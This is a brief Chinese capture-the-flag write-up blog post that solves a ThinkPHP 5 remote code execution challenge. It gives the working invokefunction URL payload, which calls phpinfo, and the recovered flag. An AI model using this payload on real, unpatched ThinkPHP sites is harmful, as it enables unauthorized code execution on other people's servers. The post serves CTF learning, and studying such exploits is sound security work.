[ThinkPHP]5-Rce 1

打开发现是一个ThinkPHP 5+框架，直接用ThinkPHP扫描工具

检测出是一个ThinkPHP 5.0.22/5.1.29的RCE漏洞，访问Payload

?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

直接在phpinfo()的环境变量里面找到flag

flag{56567b13-223b-448c-a644-4b003a020890}

posted @ 2024-11-09 23:14 TazmiDev 阅读(128) 评论(0) 收藏举报

刷新页面返回顶部

欢迎光临꒰ ๑͒ ･౪･๑͒꒱